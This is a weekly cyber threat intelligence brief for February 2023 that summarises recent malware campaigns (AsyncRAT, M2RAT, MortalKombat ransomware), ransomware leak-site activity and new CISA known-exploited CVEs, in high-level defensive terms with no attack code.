Cyber Intel Brief: Feb 09 – 15, 2023

Threat Landscape

Department of Health and Human Services Publishes Annual Report

Impacted Industries: Healthcare and Social Services

What You Need To Know:

The US Department of Health and Human Services (HC3) published a lengthy 103-page report titled: 2022 Healthcare Cybersecurity Year in Review and a 2023 Look-Ahead. The report aims to answer three questions based on data from 2022. HC3 assesses that ransomware and data breaches will likely continue to threaten the healthcare and social services industry, and cybercriminals will continue leveraging traditional infection vectors to facilitate attacks. They also assess that unrelated geopolitical events can directly or indirectly impact the US healthcare and social services industry.


Windows Help File Used to Deliver AsyncRAT and Malware That Takes Screenshots

Impacted Industries: Accommodation: Traveler; Potential for All

What You Need To Know:

AhnLabs has confirmed the distribution, through Windows Help files (.chm), of AsyncRAT, a publicly available remote access tool, and an infostealer designed to take screenshots. However, AhnLab does not disclose how the victim received the CHM file. The Windows Help file downloaded several files that executed several PowerShell commands.


New Malware M2RAT Steals Sensitive Data

Impacted Industries: All

What You Need To Know:

AhnLab details an incident where cybercriminals used a new malware they dubbed M2RAT delivered through phishing email attachments. The malware can exfiltrate process information, keylogging, and document and voice files, including those from connected portable devices. The malware will periodically capture screenshots, but the cybercriminal can issue a command to capture those when desired. M2RAT uses a shared memory section for C2 communication, the transfer of stolen data to the C2 without storing them in the compromised system, and data exfiltration. AhnLab attributed the attack to APT37 (RedEyes, ScarCruft), basing their attribution on the techniques employed having been used by APT37.


Phishing Email Leads to Ransomware or Cryptocurrency Wallet Theft

Impacted Industries: All

What You Need To Know:

Cisco Talos has observed an unknown cybercriminal deploying two relatively new threats, the recently discovered MortalKombat ransomware or a variant of the Laplas Clipper malware, to extort or steal cryptocurrency from victims. A typical infection in this campaign begins with a phishing email with a ZIP attachment. When the target opens the ZIP attachment, it kicks off a multi-stage attack chain in which the cybercriminal delivers either the clipper malware or ransomware, then deletes evidence of malicious files to avoid detection and analysis. Using the Analysis of Competing Hypotheses, we assess that two separate cybercriminals used the same Phishing-as-a-Service or phishing kit.

Threat Actors

Latest Additions to Data Leak Sites

Impacted Industries: All

What You Need To Know:

In the past week, monitored threat groups added 32 victims to their leak sites. Twenty-one of those listed are US-based. Great Britain and France had two victims each listed. The most popular industries were manufacturing and professional services, with five victims; and transportation and education, with three victims each. This information represents victims who the cybercriminals may have successfully attacked but opted not to negotiate or pay a ransom. However, we can not confirm the validity of the cybercriminals’ claims.

Exploited Vulnerabilities

CISA Adds Seven CVEs to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on the evidence of active exploitation, CISA has added seven CVEs (listed below) to its Known Exploited Vulnerabilities Catalog. Some of the software affected include Fortra, TerraMaster, Apple, and Microsoft. Multiple sources routinely report exploiting publicly-facing applications as one of the top initial infection vectors.

  • CVE-2023-0669 – Fortra GoAnywhere MFT
  • CVE-2022-2990 – TerraMaster OS
  • CVE-2015-2291 – Intel Ethernet Diagnostics Driver for Windows
  • CVE-2023-21823 – Microsoft Windows
  • CVE-2023-23529 – Apple 
  • CVE-2023-23376 – Microsoft Windows
  • CVE-2023-21715 – Microsoft Office

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.


LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog